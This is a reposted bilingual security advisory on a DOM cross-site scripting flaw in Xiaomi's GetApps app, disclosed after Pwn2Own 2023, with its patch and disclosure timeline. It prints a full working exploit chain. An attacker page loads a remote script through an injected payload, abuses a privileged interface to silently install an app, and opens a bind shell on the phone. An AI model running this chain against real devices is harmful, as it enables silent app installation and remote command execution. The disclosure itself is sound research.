Technical Advisory: Xiaomi 13 Pro Code Execution via GetApps DOM Cross-Site Scripting (XSS)

Summary 概括

The GetApps Android Application (com.xiaomi.mipicks) versions 30.4.1.0 and below are vulnerable to a DOM Cross-Site Scripting issue within a privileged WebView. Using this issue, it was possible to execute against a privileged JavaScript Interface to install and open any application available in the GetApps application store.
GetApps Android 应用程序 (com.xiaomi.mipicks) 版本 30.4.1.0 及更低版本容易受到特权 WebView 内 DOM 跨站点脚本问题的影响。利用此问题，可以针对特权 JavaScript 接口执行来安装和打开 GetApps 应用程序商店中可用的任何应用程序。

Impact 影响

If a malicious application were to be uploaded to the GetApps application store, then this issue could be used to install said application and execute arbitrary shell commands on the victim device.
如果恶意应用程序被上传到 GetApps 应用程序商店，则该问题可用于安装该应用程序并在受害者设备上执行任意 shell 命令。

Exploit 开发

To successfully exploit this issue, two files are required to be hosted on an attacker’s web server:
要成功利用此问题，攻击者的 Web 服务器上需要托管两个文件：

• index.html
  ·          索引.html
• yay.js
  ·          耶.js

The contents of index.html is below:
index.html的内容如下：

<html> <head> <title>yaytitleyay</title> </head> <body> <script type=”text/javascript”> var yayhostyay = location.hostname; // gets host / domain, can also set this to a static value var yayportyay = location.port // must be a port number of some sort, or let the script get the prot number by itself var yaypayloadyay = “{\”title\”:\”look at my PoC!\”,\”type\”:\”yaytypeyay\\u0022\\u003e\\u003csvg onload\\u003d\\u0022javascript\\u003aj\\u003ddocument.createElement(‘script’);j.src\\u003d’http\\u003a\\u002f\\u002f” + yayhostyay + “\\u003a” + yayportyay + “\\u002fyay.js’;document.getElementsByTagName(‘head’)[0].appendChild(j);\\u0022\\u003e\”,\”subtitle\”:\”brought to you by NCC Group\”,\”tips\”:\”also Pichu is awesome\”,\”btnTips\”:\”yayexploityay\”}” var yayhyperlinkyay = “intent://browse?url=file%3A%2F%2Fintegral-dialog-page.html?integralInfo=” + encodeURIComponent(yaypayloadyay) + “#Intent;action=android.intent.action.VIEW;scheme=mimarket;end” var a = document.createElement(“a”); a.href = yayhyperlinkyay; a.id = “yayidyay”; a.innerHTML = “YAYPOCYAY”; document.getElementsByTagName(‘body’)[0].appendChild(document.createElement(“h1”)) document.getElementsByTagName(‘h1’)[0].appendChild(a); </script> </body> </html>

The contents of yay.js is below:
yay.js的内容如下：

const sleep = async (milliseconds) => { await new Promise(resolve => { return setTimeout(resolve, milliseconds) }); }; const thePayloadYay = async () => { var yayflagyay = 1; while (yayflagyay == 1){ var yayinstalledappsyay = marketAPI.getInstalledApps({}); var yayappslengthyay = yayinstalledappsyay.length; var yaycounteryay = 0; while (yaycounteryay != yayappslengthyay) { if (yayinstalledappsyay[yaycounteryay].packageName === “com.<redacted>.sunfish”) { marketAPI.openApp({“pName”:”com.<redacted>.sunfish”}); yayflagyay = 0; } yaycounteryay = yaycounteryay + 1; } } marketAPI.showToast({“content”:”waiting for the app to be installed”}) await sleep(5000); } marketAPI.install({“extra_params”:{“downloadImmediately”:”true”,”fromUntrustedHost”:”false”,”sourcePackage”:”com.miui.home”,”startDownload”:”true”,”callerPackage”:”com.xiaomi.mipicks”,”ext_apm_isColdStart”:”false”,”callerSignature”:”88daa889de21a80bca64464243c9ede6″,”launchWhenInstalled”:”true”,”ext_apm_timeSinceColdStart”:”1362443″,”senderPackageName”:”com.xiaomi.mipicks”,”entrance”:”detail”,”pageRef”:”com.xiaomi.mipicks”,”appClientId”:”com.xiaomi.mipicks”,”refs”:”-detail/com.<redacted>.sunfish”,”sid”:””,”rId”:0,”ad”:0,”appStatusType”:0,”pName”:”com.<redacted>.sunfish”,”pos”:”detailInstallBtn”,”posChain”:”detailInstallBtn”,”newUser”:true,”activedTimeInterval”:583925,”adExchangeFlag”:0,”_ir_”:”8rj6UL-fpnYa7BCFmBSqp5jbHJSm_GgzL6bgn7GqAwc”,”ext_apm_iconType”:”static”,”ext_apm_isHotTag”:false},”ref”:”_detailInstallBtn”,”title”:”Sunfish”,”pName”:”com.<redacted>.sunfish”,”appId”:3004617,”appInfo”:{“grantCode”:0,”openLinkGrantCode”:1,”voiceAssistTag”:false,”commentable”:false,”id”:3004617,”appId”:3004617,”packageName”:”com.<redacted>.sunfish”,”displayName”:”Sunfish”,”publisherName”:”<redacted>”,”versionName”:”1.2.2″,”versionCode”:9,”updateTime”:1694181164626,”apkSize”:3710211,”compressApkSize”:0,”icon”:”AppStore/06c542c55a34b47d4a12a45bfe4187f5d8b5d8f10″,”level1CategoryId”:30,”intlCategoryId”:30,”ads”:0,”adType”:1,”position”:0,”briefShow”:”Help ensure the security of your Android applcation.”,”briefUseIntro”:false,”releaseKeyHash”:”0e140764979f5c5c0c44fd526aae29e3″,},”sid”:””,”callBack”:”marketAsyncCb.installCb”}) thePayloadYay();

The target device should then use a web browser to browse to http://<attacker’s server>/index.html and click on the hyperlink present on the webpage. When this happens, the above JavaScript will execute which will result in the application “Sunfish” being installed and opened on the device without the user’s consent.
然后，目标设备应使用 Web 浏览器浏览到http://<attacker 的服务器>/index.html并单击网页上的超链接。发生这种情况时，上述 JavaScript 将执行，这将导致应用程序“Sunfish”在未经用户同意的情况下在设备上安装并打开。

Sunfish is a re-skinned version of Drozer, which starts a bind shell on network interfaces on the device. From there, its possible for the attacker to connect to Sunfish and execute arbitrary commands:
Sunfish 是 Drozer 的重新设计版本，它在设备的网络接口上启动绑定 shell。从那里，攻击者有可能连接到 Sunfish 并执行任意命令：

root@2ee5edd7a244:/# sunfish console connect –server <phone IP address> Selecting 746aece8a83d73e2 (Xiaomi 2210132G 13) _.’.__ _.’ . ‘:’. .” __ __ . ‘.:._ ./ _ ” ‘-‘.__ .”’-: ”’-._ | . ‘-‘._ ‘. . ‘._.’ ‘ ‘. ‘-.___ . .’ . :o’. | .—- . . .’ ( ‘| —-. ‘ ,.._ _-‘ .’ .— |.” .-:;.. _____.—-‘ | .-”” | ‘ .’ _’ .’ _’ Sunfish |_.-‘ ‘-.’ sunfish Console (v2.4.4) sunfish> shell :/data/user/0/com.<redacted>.sunfish $ whoami u0_a302 :/data/user/0/com.<redacted>.sunfish $ id uid=10302(u0_a302) gid=10302(u0_a302) groups=10302(u0_a302),3003(inet),9997(everybody),20302(u0_a302_cache),50302(all_a302) context=u:r:untrusted_app_27:s0:c46,c257,c512,c768

Technical Details 技术细节

Browsable Intent Details 可浏览的意图详细信息

The exported activity com.xiaomi.market.ui.JoinActivity can be launched via Browsable Intent. This activity executes different Java functions based on the contents of the incoming Browsable Intent. One of the functions, called handleBrowse(Uri), can launch a privileged WebView with a potentially dangerous JavaScript Interface. This function can be executed if the “data” within the Browsable Intent contains the following:
导出的 Activity com.xiaomi.market.ui.JoinActivity 可以通过 Browsable Intent 启动。该活动根据传入的可浏览意图的内容执行不同的 Java 函数。其中一个名为handleBrowse(Uri)的函数可以启动具有潜在危险的JavaScript接口的特权WebView。如果可浏览意图中的“数据”包含以下内容，则可以执行此函数：

• A “scheme” value of mimarket
  ·          mimarket的“方案”价值
• A “host” value of browse
  ·          browser的“host”值

To limit potential attacks which can abuse the JavaScript Interface, the application will not allow handleBrowse(Uri) to launch the privileged WebView unless the URL is considered “safe”. The logic for assessing and validating URLs can be found in class com.xiaomi.market.util.UrlCheckUtilsKt method isUrlMatchLevel(String, HostLevel, boolean).
为了限制可能滥用 JavaScript 接口的潜在攻击，应用程序将不允许handleBrowse(Uri) 启动特权 WebView，除非该 URL 被认为是“安全”的。评估和验证 URL 的逻辑可以在类com.xiaomi.market.util.UrlCheckUtilsKt 方法isUrlMatchLevel(String, HostLevel, boolean)中找到。

Below is a high level description of what are considered “safe” URLs:
以下是对“安全”URL 的高级描述：

• If the URL starts with https://, then the host value must match a whitelisted domain (the whitelist is kept internally within the application)
  ·          如果 URL 以 https:// 开头，则主机值必须与列入白名单的域匹配（白名单保留在应用程序内部）
• If the URL starts with file://, then the host and path values must match one of the files found in the directory /data/data/com.xiaomi.mipicks/files/web-res-XXXX on the device
  ·          如果 URL 以 file:// 开头，则主机和路径值必须与设备上的目录 /data/data/com.xiaomi.mipicks/files/web-res-XXXX 中找到的文件之一匹配

Below is a code snippet of how a URL is passed from handleBrowse(Uri) to isUrlMatchLevel(String, HostLevel, boolean):
下面是如何将URL从handleBrowse(Uri) 传递到 isUrlMatchLevel(String, HostLevel, boolean) 的代码片段：

public class JoinActivity extends BaseActivity { … private void handleBrowse(Uri uri){ Intent targetIntent; … String queryParameter = uri.getQueryParameter(“url”); if (UrlCheckUtilsKt.isJsInterfaceAllowed(queryParameter)) { targetIntent = getTargetIntent(intFromIntent == 1 ? FloatWebActivity.class : CommonWebActivity.class); … targetIntent.putExtra(“url”), queryParameter; … startActivity(targetIntent);

public final class UrlCheckUtilsKt { public static final boolean isJsInterfaceAllowed(String str) { … boolean isUrlMatchLevel = isUrlMatchLevel(str, HostLevel.TRUSTED) … public static final boolean isUrlMatchLevel(String str, HostLevel level){ … boolean isUrlMatchLevel = isUrlMatchLevel(str, level, true) … public static final boolean isUrlMatchLevel(String str, HostLevel level, boolean z)({

If the URL is considered valid, then one of the following WebViews will be launched via startActivity(Intent):
如果 URL 被认为有效，则将通过 startActivity(Intent) 启动以下 WebView 之一：

• com.xiaomi.market.ui.FloatWebActivity
  ·          com.xiaomi.market.ui.FloatWebActivity
• com.xiaomi.market.ui.CommonWebActivity
  ·          com.xiaomi.market.ui.CommonWebActivity

As an example, the following Browsable Intent can be used to launch the exported activity com.xiaomi.market.ui.JoinActivity, open the privileged WebView com.xiaomi.market.ui.CommonWebActivity, and open the file /data/data/com.xiaomi.mipicks/files/web-res-XXXX/detail.html:
例如，以下 Browsable Intent 可用于启动导出的 Activity com.xiaomi.market.ui.JoinActivity，打开特权 WebView com.xiaomi.market.ui.CommonWebActivity，并打开文件 /data/data/com .xiaomi.mipicks/files/web-res-XXXX/detail.html：

<a id=”yayidyay” rel=”noreferrer” href=”intent://browse?url=file%3A%2F%2Fdetail.html#Intent;action=android.intent.action.VIEW;scheme=mimarket;end”>YAYPOCYAY</a>
<a id=”yayidyay” rel=”noreferrer” href=”intent://browse?url=file%3A%2F%2Fdetail.html#Intent;action=android.intent.action.VIEW;scheme=mimarket;end “>YAYPOCYAY</a>

Below is a screenshot of the resulting detail.html page. It should be noted that the lack of content in the web page is intentional:
下面是生成的detail.html 页面的屏幕截图。需要注意的是，网页中缺少内容是故意的：

DOM Cross-Site Scripting (XSS)
DOM 跨站脚本 (XSS)

The folder /data/data/com.xiaomi.mipicks/files/web-res-XXXX/ contained the following types of files:
文件夹 /data/data/com.xiaomi.mipicks/files/web-res-XXXX/ 包含以下类型的文件：

• HTML files – render basic HTML and load JavaScript files to render content
  ·          HTML 文件 – 渲染基本 HTML 并加载 JavaScript 文件以渲染内容
• JavaScript files – the JavaScript files that are loaded by the HTML files
  ·          JavaScript 文件 – 由 HTML 文件加载的 JavaScript 文件

Most of the JavaScript files contained an integrated function to filter potentially dangerous characters. This is because some HTML files were required to take user input (via URL GET parameters) and fill out the HTML content based on the user input.
大多数 JavaScript 文件都包含一个集成函数来过滤潜在危险的字符。这是因为某些 HTML 文件需要获取用户输入（通过 URL GET 参数）并根据用户输入填写 HTML 内容。

However, the file integral-dialog-page-chunk.js did not filter out dangerous characters in one area, resulting in the ability to perform a DOM Cross-Site Scripting (XSS) attack in the page integral-dialog-page.html.
然而，文件integral-dialog-page-chunk.js没有过滤掉某一区域的危险字符，导致能够在页面integral-dialog-page.html中执行DOM跨站脚本（XSS）攻击。

Below is a Browsable Intent PoC which demonstrates this issue by executing the command alert(1) after loading the page integral-dialog-page.html:
下面是一个可浏览意图 PoC，它通过在加载页面integral-dialog-page.html后执行命令alert(1)来演示此问题：

<h1>
<a id=”yayidyay” rel=”noreferrer” href=”intent://browse?url=file%3A%2F%2Fintegral-dialog-page.html?integralInfo=%7b%22%74%69%74%6c%65%22%3a%22%6c%6f%6f%6b%20%61%74%20%6d%79%20%50%6f%43%21%22%2c%22%74%79%70%65%22%3a%22%79%61%79%74%79%70%65%79%61%79%5c%75%30%30%32%32%5c%75%30%30%33%65%5c%75%30%30%33%63%73%76%67%20%6f%6e%6c%6f%61%64%5c%75%30%30%33%64%5c%75%30%30%32%32%6a%61%76%61%73%63%72%69%70%74%5c%75%30%30%33%61%61%6c%65%72%74%28%27%70%72%69%76%69%6c%65%67%65%64%20%6d%61%72%6b%65%74%41%50%49%3a%20%27%20%2b%20%6d%61%72%6b%65%74%41%50%49%29%5c%75%30%30%32%32%5c%75%30%30%33%65%22%2c%22%73%75%62%74%69%74%6c%65%22%3a%22%62%72%6f%75%67%68%74%20%74%6f%20%79%6f%75%20%62%79%20%4e%43%43%20%47%72%6f%75%70%22%2c%22%74%69%70%73%22%3a%22%61%6c%73%6f%20%50%69%63%68%75%20%69%73%20%61%77%65%73%6f%6d%65%22%2c%22%62%74%6e%54%69%70%73%22%3a%22%79%61%79%65%78%70%6c%6f%69%74%79%61%79%22%7d#Intent;action=android.intent.action.VIEW;scheme=mimarket;end”>
        YAYPOCYAY</a> 耶波西亚
</h1>

Decoded payload value: 解码后的有效负载值：

file://integral-dialog-page.html?integralInfo={“title”:”look at my PoC!”,”type”:”yaytypeyay”><svg onload=”javascript:alert(1)”>”,”subtitle”:”brought to you by NCC Group”,”tips”:”also Pichu is awesome”,”btnTips”:”yayexploityay”}
file://integral-dialog-page.html?integralInfo={“title”:”看看我的 PoC！”,”type”:”yaytypeyay”><svg onload=”javascript:alert(1)”> “,”subtitle”:”NCC Group 为您提供”,”tips”:”Pichu 也很棒”,”btnTips”:”yayexploityay”}

Below is a screenshot of the DOM XSS payload being executed on the device:
下面是在设备上执行的 DOM XSS 负载的屏幕截图：

Privileged JavaScript Interface WebEvent
特权 JavaScript 接口 WebEvent

The previously mentioned privileged WebView loads the JavaScript Interface “WebEvent” (com.xiaomi.market.webview.WebEvent).
前面提到的特权WebView加载JavaScript接口“WebEvent”（ com.xiaomi.market.webview.WebEvent）。

This JavaScript Interface contained two useful methods which could be executed via JavaScript:
该 JavaScript 接口包含两个可以通过 JavaScript 执行的有用方法：

• install(string) – this method will install any application that is available on the GetApps store
  ·          install(string) – 此方法将安装 GetApps 商店中提供的任何应用程序
• openApp(string) – this method will find the launch intent for any installed application and run that intent, opening the specified application
  ·          openApp(string) – 此方法将查找任何已安装应用程序的启动意图并运行该意图，打开指定的应用程序

Launching the WebView and Executing Against WebEvent
启动 WebView 并针对 WebEvent 执行

In order to execute JavaScript against the “WebEvent” JavaScript Interface, the integral-dialog-page.html page must be launched and user input must contain the appropriate JavaScript.
为了针对“WebEvent”JavaScript 接口执行 JavaScript，必须启动integral-dialog-page.html 页面，并且用户输入必须包含适当的 JavaScript。

The following Browsable Intent can be used to launch the privileged WebView, load the page integral-dialog-page.html, and execute the JavaScript command alert(marketAPI). This shows that it is possible to execute arbitrarily against the privileged JavaScript Interface found at com.xiaomi.market.webview.WebEvent:
以下可浏览意图可用于启动特权WebView，加载页面integral-dialog-page.html，并执行JavaScript命令alert(marketAPI) 。这表明可以针对 com.xiaomi.market.webview.WebEvent 中的特权 JavaScript 接口任意执行：

<h1>
<a id=”yayidyay” rel=”noreferrer” href=”intent://browse?url=file%3A%2F%2Fintegral-dialog-page.html?integralInfo=%7b%22%74%69%74%6c%65%22%3a%22%6c%6f%6f%6b%20%61%74%20%6d%79%20%50%6f%43%21%22%2c%22%74%79%70%65%22%3a%22%79%61%79%74%79%70%65%79%61%79%5c%75%30%30%32%32%5c%75%30%30%33%65%5c%75%30%30%33%63%73%76%67%20%6f%6e%6c%6f%61%64%5c%75%30%30%33%64%5c%75%30%30%32%32%6a%61%76%61%73%63%72%69%70%74%5c%75%30%30%33%61%61%6c%65%72%74%28%27%70%72%69%76%69%6c%65%67%65%64%20%6d%61%72%6b%65%74%41%50%49%3a%20%27%20%2b%20%6d%61%72%6b%65%74%41%50%49%29%5c%75%30%30%32%32%5c%75%30%30%33%65%22%2c%22%73%75%62%74%69%74%6c%65%22%3a%22%62%72%6f%75%67%68%74%20%74%6f%20%79%6f%75%20%62%79%20%4e%43%43%20%47%72%6f%75%70%22%2c%22%74%69%70%73%22%3a%22%61%6c%73%6f%20%50%69%63%68%75%20%69%73%20%61%77%65%73%6f%6d%65%22%2c%22%62%74%6e%54%69%70%73%22%3a%22%79%61%79%65%78%70%6c%6f%69%74%79%61%79%22%7d#Intent;action=android.intent.action.VIEW;scheme=mimarket;end”>
        YAYPOCYAY</a> 耶波西亚
</h1>

Decoded payload value: 解码后的有效负载值：

file://integral-dialog-page.html?integralInfo={“title”:”look at my PoC!”,”type”:”yaytypeyay”><svg onload=”javascript:alert(‘privileged marketAPI: ‘ + marketAPI)”>”,”subtitle”:”brought to you by NCC Group”,”tips”:”also Pichu is awesome”,”btnTips”:”yayexploityay”}
file://integral-dialog-page.html?integralInfo={“title”:”看看我的 PoC！”,”type”:”yaytypeyay”><svg onload=”javascript:alert(‘特权市场API: ‘ + marketAPI)”>”,”subtitle”:”NCC Group 为您提供”,”tips”:”Pichu 也很棒”,”btnTips”:”yayexploityay”}

Below is a screenshot of the above payload being executed:
下面是上述有效负载正在执行的屏幕截图：

Using this, it is possible to execute the JavaScript Interface functions install(String) and openApp(String). To fully take advantage of this issue, an attacker would need to upload a malicious app to the GetApps store. Then this exploit will need to be abused to install said malicious application and launch it automatically.
使用它，可以执行 JavaScript 接口函数install(String) 和 openApp(String) 。要充分利用此问题，攻击者需要将恶意应用程序上传到 GetApps 商店。然后需要滥用此漏洞来安装所述恶意应用程序并自动启动它。

Sunfish 翻车鱼

To demonstrate the severity of this issue, the application “Sunfish” was uploaded to the GetApps store. Sunfish is a re-skinned copy of Drozer, whish a common tool used for penetration testing of Android devices. This version of Sunfish (Drozer) is also configured to start a bind shell when the application is launched.
为了证明此问题的严重性，应用程序“Sunfish”已上传到 GetApps 商店。 Sunfish 是 Drozer 的重新设计版本，Drozer 是用于 Android 设备渗透测试的常用工具。此版本的 Sunfish (Drozer) 还配置为在应用程序启动时启动绑定 shell。

Combining the Pieces 组合各个部分

With all of the information above, the workflow for this exploit looks like the following:
有了上述所有信息，该漏洞利用的工作流程如下所示：

• User with a Xiaomi 13 Pro browses to an attacker controlled web server and clicks a hyper link that was crafted by the attacker
  ·          使用小米 13 Pro 的用户浏览到攻击者控制的 Web 服务器并单击攻击者制作的超链接
• The GetApps application is launched and the privileged WebView is launched
  ·          GetApps 应用程序启动并启动特权 WebView
• The DOM XSS issue is exploited to inject custom JavaScript into the privileged WebView
  ·          利用 DOM XSS 问题将自定义 JavaScript 注入特权 WebView
• The attacker controlled custom JavaScript executes commands against the “WebEvent” JavaScript Interface to install and open Sunfish
  ·          攻击者控制自定义 JavaScript，针对“WebEvent”JavaScript 接口执行命令来安装和打开 Sunfish
• Sunfish is launched, and a bind shell is started
  ·          Sunfish 启动，并启动绑定 shell
• The attacker connects to the bind shell, which can then execute commands within the context of Sunfish
  ·          攻击者连接到绑定 shell，然后该 shell 可以在 Sunfish 上下文中执行命令

Disabled Browsers for Specific Versions of GetApps
禁用 GetApps 特定版本的浏览器

During Pwn2Own Toronto 2023, Xiaomi temporarily implemented code into the GetApps application which would block the ability to launch JoinActivity via Browsable Intent. This code was later removed from GetApps after the Pwn2Own competition had concluded.
在 Pwn2Own Toronto 2023 期间，小米临时在 GetApps 应用程序中实施了代码，这将阻止通过 Browsable Intent 启动 JoinActivity 的能力。 Pwn2Own 竞赛结束后，此代码随后从 GetApps 中删除。

Below is a list of GetApps versions, their SHA256 hashes, and which browsers are prohibited from launching JoinActivity:
以下是 GetApps 版本、其 SHA256 哈希值以及禁止哪些浏览器启动 JoinActivity 的列表：

• Version 30.2.7.0
  ·          版本30.2.7.0

o   SHA256 – 4cf142334ed34c3705c2a30c3aba121861e57d8c5d1d8341f194ad4723dc5be8
哦   SHA256 – 4cf142334ed34c3705c2a30c3aba121861e57d8c5d1d8341f194ad4723dc5be8

o   Browsers blocked:
哦   浏览器被阻止：

• Xiaomi Browser (com.mi.globalbrowser)
  §   小米浏览器（ com.mi.globalbrowser）
• Android HTML Viewer (com.android.htmlviewer)
  §   Android HTML 查看器 ( com.android.htmlviewer)
• Android NFC (com.android.nfc)
  §   安卓 NFC ( com.android.nfc)
• Google Chrome (com.android.chrome)
  §   谷歌浏览器（ com.android.chrome）
• Version 30.2.8.0
  ·          版本30.2.8.0

o   SHA256 – 7637f7fe3dd1c53e072069faabda59683272115e561fa5e400bd0586093accd1
零   SHA256 – 7637f7fe3dd1c53e072069faabda59683272115e561fa5e400bd0586093accd1

o   Browsers blocked:
哦   浏览器被阻止：

• Xiaomi Browser (com.mi.globalbrowser)
  §   小米浏览器（ com.mi.globalbrowser）
• Android HTML Viewer (com.android.htmlviewer)
  §   Android HTML 查看器 ( com.android.htmlviewer)
• Android NFC (com.android.nfc)
  §   安卓 NFC ( com.android.nfc)
• Google Chrome (com.android.chrome)
  §   谷歌浏览器（ com.android.chrome）
• Opera Browser (com.opera.browser)
  §   Opera 浏览器（ com.opera.browser）
• Yandex Browser (com.yandex.browser)
  §   Yandex 浏览器 ( com.yandex.browser)

The application logic to block the above browsers can be seen in the below code snippet, taken from GetApps version 30.2.7.0.
阻止上述浏览器的应用程序逻辑可以在下面的代码片段中看到，取自 GetApps 版本 30.2.7.0。

The value matchSpecialCallingPackage is set to true if the Browsable Intent was sent from one of the above blacklisted browsers. Since matchSpecialCallingPackage is true, the method handleIntent() will always return before the handleBrowse(Uri uri) function can be executed.
如果可浏览意图是从上述黑名单浏览器之一发送的，则值 matchSpecialCallingPackage 将设置为 true。由于matchSpecialCallingPackage为true，handleIntent()方法将始终在handleBrowse(Uri uri)函数执行之前返回。

public class JoinActivity extends BaseActivity {
公共类 JoinActivity 扩展 BaseActivity {
…
    private void handleInent() {
私有无效handleInent（）{
    …
    boolean matchSpecialCallingPackage = matchSpecialCallingPackage();
布尔 matchSpecialCallingPackage = matchSpecialCallingPackage();
    …
                if (matchSpecialCallingPackage) {
如果（匹配特殊呼叫包）{
                        if (!TextUtils.equals(targetPage, PAGE_DETAILS) && !TextUtils.equals(targetPage, “detail”) && !TextUtils.equals(targetPage, PAGE_LAUNCH_DETAIL)) {
if (!TextUtils.equals(targetPage, PAGE_DETAILS) && !TextUtils.equals(targetPage, “detail”) && !TextUtils.equals(targetPage, PAGE_LAUNCH_DETAIL)) {
                            launchTargetActivity(MarketTabActivity.class);
                        } else { } 别的 {
                            handleDetails(intent, scheme, targetPage);
处理详细信息（意图，方案，目标页面）；
                        }
                        MethodRecorder.o(9268);
方法记录器.o(9268);
                        return; 返回;
                    }
                …
                if (TextUtils.equals(targetPage, PAGE_BROWSE)) {
                        handleBrowse(data); 处理浏览（数据）；
                        MethodRecorder.o(9268);
方法记录器.o(9268);
                        return; 返回;
                    }

private boolean matchSpecialCallingPackage() {
私有布尔 matchSpecialCallingPackage() {
    …
    boolean contains = sBlackPkgArrayList.contains(getCallingPackage());
布尔包含 = sBlackPkgArrayList.contains(getCallingPackage());
    …
    return contains; 返回包含；
}

Recommendation 推荐

Xiaomi has stated that this issue was resolved in GetApps version 32.0.0.1. Users should update their GetApps application to at least that version.
小米表示，该问题已在 GetApps 32.0.0.1 版本中得到解决。用户应至少将其 GetApps 应用程序更新到该版本。

Vendor Communication 供应商沟通

2023-10-25 – Exploit demonstrated at Pwn2Own Toronto 2023, exploit details handed over to Zero Day Initiative (ZDI)
2023-10-25 –漏洞在 2023 年多伦多 Pwn2Own 大会上展示，漏洞详细信息已移交给零日计划 (ZDI)

2023-11-09 – ZDI reported vulnerability to Xiaomi
2023-11-09 – ZDI 向小米报告漏洞

2024-05-01 – Coordinated public release of advisory
2024-05-01 – 协调公开发布公告

Note: Xiaomi has not assigned a CVE for this issue. When ZDI worked with Xiaomi to patch this issue, Xiaomi informed ZDI they would assign a CVE, but never followed through. So instead, ZDI has assigned the CVE number CVE-2024-4406 for this issue.
注意：小米尚未为此问题分配 CVE。当 ZDI 与小米合作修复此问题时，小米告知 ZDI 他们将分配 CVE，但从未跟进。因此，ZDI 已为此问题分配 CVE 编号 CVE-2024-4406。

原文始发于Ken Gannon：Technical Advisory: Xiaomi 13 Pro Code Execution via GetApps DOM Cross-Site Scripting (XSS)